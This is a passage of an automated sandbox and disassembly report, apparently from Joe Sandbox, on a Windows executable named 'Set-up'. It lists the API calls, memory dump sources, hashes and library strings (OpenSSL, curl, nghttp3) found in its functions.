                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 00DE447B
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 00DE44C4
                          • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 00DE44E3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00DE4500
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE450B
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 00DE451F
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DE4546
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                          • String ID:
                          • API String ID: 389649969-0
                          • Opcode ID: 79580a64df73d59115ece4ab6ad58f664f6d87adafbe4505457cf79c97910a8a
                          • Instruction ID: e07f4aa8fb99c259693fa3b422fff9a4ff0e1fec6a0cef2845d9a60d245cd936
                          • Opcode Fuzzy Hash: 79580a64df73d59115ece4ab6ad58f664f6d87adafbe4505457cf79c97910a8a
                          • Instruction Fuzzy Hash: 3A314FB290438567F720B636DC01BBB769CDB90354F08412CF84C961C1E779ED448372
                          APIs
                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00C9F763,?,?,?,?,?), ref: 00CA2251
                          • WideCharToMultiByte.KERNEL32 ref: 00CA2284
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00CA22BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$wcslen
                          • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 1062461220-336193293
                          • Opcode ID: 12464a256989e6c2cd2393105ea555fdc4fb911ab45f6094c6fc8d32dbb9cbf1
                          • Instruction ID: 3f3711bba6fc9ecdc2b8f458bc13813206ffd51302c1ce6b24a39f7c40aa32ba
                          • Opcode Fuzzy Hash: 12464a256989e6c2cd2393105ea555fdc4fb911ab45f6094c6fc8d32dbb9cbf1
                          • Instruction Fuzzy Hash: 8D214DB1F053157BFB303663AC06B2B359CDB83B18F04413DF54899195EAFD48419792
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,00DBDA6D,00000000,010F09B4,?,?,?,?,?), ref: 00DD299B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2A76
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00DD2A82
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2AAE
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2ABA
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DD2B3F
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DD2C32
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,00DBDA6D,00000000,010F09B4,?,?,?,?,?), ref: 00DD2CB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$freemalloc
                          • String ID:
                          • API String ID: 3313557100-0
                          • Opcode ID: 98a7c1f34d5817035f636342c4a9970a368f24d94da7c3b60ab47671f442954d
                          • Instruction ID: 8c7708a5e4fce1d0923ecebdc184681a0095f1d2cce3f87bc6dffcf6959221ee
                          • Opcode Fuzzy Hash: 98a7c1f34d5817035f636342c4a9970a368f24d94da7c3b60ab47671f442954d
                          • Instruction Fuzzy Hash: CFD17D71A042149FCB14DF2CC884AAA7BE5FFA8314F19862AFC5987395D771EC40DBA1
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00BBA9CE,000000D2), ref: 00C183A3
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BBA9CE), ref: 00C183C6
                            • Part of subcall function 00C160E0: GetLastError.KERNEL32(00C17CCC,?,00000000,00C17127,00C17CCC,00000000,00C3CAB7,00A61A70), ref: 00C160E3
                            • Part of subcall function 00C160E0: SetLastError.KERNEL32(00000000), ref: 00C161A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$strcpystrlen
                          • String ID: crypto/err/err_local.h
                          • API String ID: 542397150-344804083
                          • Opcode ID: 073e8861da26e7cf4fef4f109c0cd54c1761c0e67abd9504f7b2a0ed019c5dc2
                          • Instruction ID: 98ea9736fd8d375593147036eaa8f56463c873b6e76661c31cd368c3577ca304
                          • Opcode Fuzzy Hash: 073e8861da26e7cf4fef4f109c0cd54c1761c0e67abd9504f7b2a0ed019c5dc2
                          • Instruction Fuzzy Hash: 5F81E5B0504B01AFE3239F28E885BE6B7E0FB4130CF444E1CE5E9872A5DB79A558DB50
                          APIs
                            • Part of subcall function 00A673F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A6741D
                            • Part of subcall function 00A673F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00A67445
                            • Part of subcall function 00AA47D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 00AA47FB
                            • Part of subcall function 00AA47D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00AA480C
                            • Part of subcall function 00AA47D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00AA4837
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00A66844
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00A66876
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00A668FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$feoffgetsmemcmpmemcpy
                          • String ID: %256s "%64[^"]"$hsts.c$unlimited
                          • API String ID: 288886899-2895786126
                          • Opcode ID: cc9f03fcfbbe0f9af4f03ebcba31490019c6ba1049056921f41c27867db97b46
                          • Instruction ID: 9c62a222fd398453a45710aeb5070da13abe1c055e54523ccc480e1cdb7ee414
                          • Opcode Fuzzy Hash: cc9f03fcfbbe0f9af4f03ebcba31490019c6ba1049056921f41c27867db97b46
                          • Instruction Fuzzy Hash: 9D51F7B1D443417BEB109B30AE42A6B77B89F95704F144828FC59A7282FB35EA14D7A3
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00C59265,?,00000400,00000000,?), ref: 00C58254
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00C59265,?), ref: 00C58264
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00C59265,?,?,?,?,?,?,00C59265,?,00000400,00000000,?), ref: 00C582C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemsetstrlen
                          • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                          • API String ID: 160209724-3271887637
                          • Opcode ID: 9c4bf3c444ced897deb02be037e14e93e5be3c82f65d2e847c1e0a822983ed3d
                          • Instruction ID: f7353c8df00ceb1aea9ffe70659e16e3a695857ab16416527a588e23be8052c0
                          • Opcode Fuzzy Hash: 9c4bf3c444ced897deb02be037e14e93e5be3c82f65d2e847c1e0a822983ed3d
                          • Instruction Fuzzy Hash: 77016DA6B0032037E1107566AC83F7F365CCB82755F140135FE08A6183E950DC0961B2
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B0895D
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B08991
                          • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B0899A
                          • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B089AB
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B089B4
                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B089B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
                          • String ID:
                          • API String ID: 1064163434-0
                          • Opcode ID: 1824e6f6de629ecf65bf5e45b28e50dbca4e6fac1c253d67cdc56c369d8e00d7
                          • Instruction ID: 85baad5ffdb5663d431cd07fd26b14a0d8d29bbdc682e0fe0e6ec4422cac4d94
                          • Opcode Fuzzy Hash: 1824e6f6de629ecf65bf5e45b28e50dbca4e6fac1c253d67cdc56c369d8e00d7
                          • Instruction Fuzzy Hash: 33119EB0409704AFC340BF2AD64562EFFE4AF88750F41981EF9C887341EB7899408BA3
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00A95B6B,00000017,?,?), ref: 00AC4612
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00AC4660
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errnomemchr
                          • String ID: 0123456789ABCDEF$0123456789abcdef
                          • API String ID: 4119152314-885041942
                          • Opcode ID: 68e456c143758da2bce633f099572839b592cc5a9e320ecab09d16215c1468e0
                          • Instruction ID: 96dd00fec36ffaf29de8c5e037ed120128fb50ff70d37dea2710d533276560bb
                          • Opcode Fuzzy Hash: 68e456c143758da2bce633f099572839b592cc5a9e320ecab09d16215c1468e0
                          • Instruction Fuzzy Hash: 31910471A083418BD728DF28C860B6AB3E1AFDA314F1A8A2DE8D597381D7359D458746
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB225F
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AB22CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                          • API String ID: 3014104814-1335658360
                          • Opcode ID: 0fa8fac201e23fbecb990e46ea26a430bec9fe02ffcb8e2e8141ac0f7c46b523
                          • Instruction ID: 24eb05e2ff6f1a5d5124ac8abfcb9a147b518bc8a2e8984e1fbe4b37c0422e03
                          • Opcode Fuzzy Hash: 0fa8fac201e23fbecb990e46ea26a430bec9fe02ffcb8e2e8141ac0f7c46b523
                          • Instruction Fuzzy Hash: 654167B1A007445BD724AB24DC81BFBB7E9EF84304F08883DE9898B283E635EC55D761
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00B10307,?), ref: 00B107AE
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B107C3
                          Strings
                          • ctx->next_absidx > absidx, xrefs: 00B107A9
                          • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 00B107BE
                          • nghttp3_qpack.c, xrefs: 00B107A4, 00B107B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                          • API String ID: 1222420520-241347991
                          • Opcode ID: 67d8a95585f25c2295beb5ad7fafa0cfd265af54c176aadc6365a86b4b7fb016
                          • Instruction ID: 4ba3f415376c32f38c767825cf98bfdd39474345e55e771e16b5b22d0cef84b2
                          • Opcode Fuzzy Hash: 67d8a95585f25c2295beb5ad7fafa0cfd265af54c176aadc6365a86b4b7fb016
                          • Instruction Fuzzy Hash: 2931D3757006046FD310AA28DC81E6B73D9BF89714F44956CF98A87282E671F8918B92
                          APIs
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00A75FB6,?), ref: 00DE4645
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00DE4698
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,010A4258), ref: 00DE4744
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00DE4762
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _stat64$fclosefopen
                          • String ID: ../list/public_suffix_list.dat
                          • API String ID: 1085753941-141370353
                          • Opcode ID: 26aeed6d4ec64ec737a460ff638186a9ee47f8d1b3c97a390bc6d2f11c1fe5eb
                          • Instruction ID: 21c1646050d97ae4762ae565036d8c688246919ab33bdfe41b352fdcceb95e52
